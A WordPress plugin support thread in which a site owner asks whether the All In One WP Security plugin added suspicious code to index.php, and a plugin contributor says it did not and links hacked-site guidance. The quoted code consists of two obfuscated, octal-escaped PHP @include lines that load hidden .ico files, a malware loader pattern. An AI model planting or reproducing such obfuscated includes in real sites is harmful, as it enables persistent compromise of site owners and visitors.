Support » Plugin: All In One WP Security & Firewall » Does All in One add this content to me index.php file?

  • Hi folks,

    First off, many thanks for creating such a marvellous plugin!

    I recently had issues with my site and found a load of malicious code in my wp.config file which I have subsequently removed.

    However, I’m seeing the following lines of code injected into my index.php file and wondered if these strings were being created by All in One prior to removing – see here:
    <?php
    /*4b82e*/

    @include “\057dom\141ins\057a/b\057abo\165tme\146ory\157u.c\157.uk\057pub\154ic_\150tml\057wp-\141dmi\156/cs\163/co\154ors\057.6b\1448c3\066e.i\143o”;

    /*4b82e*/
    /*420e7*/

    @include “\057do\155ai\156s/\141/b\057ab\157ut\155ef\157ry\157u.\165se\162s6\060.i\156te\162dn\163.c\157.u\153/p\165bl\151c_\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\104ec\157de\057.8\14355\06742\142.i\143o”;

    /*420e7*/
    /**

    Thanks in advance for any help and guidance

    Darron

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Contributor mbrsolution

    (@mbrsolution)

    Hi, our plugin does not inject any code into the files you mentioned. The only file our plugin writes to is the .htaccess file.

    If you suspect that your site has been hacked, then you might like to speak to your host about this issue. You can also check the following links. These are instructions provided by WordPress org support staff.

    My Site was hacked
    Hardening WordPress

    Let me know if you need more help.

    Kind regards

    Thread Starter graffig

    (@graffig)

    Hi there again,

    Thank you so much for getting back to me so quickly!

    Really appreciate you taking the time out to confirm that the code is not injected by All in One and for the enclosed links that I will investigate further.

    Regards,

    Darron

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Does All in One add this content to me index.php file?’ is closed to new replies.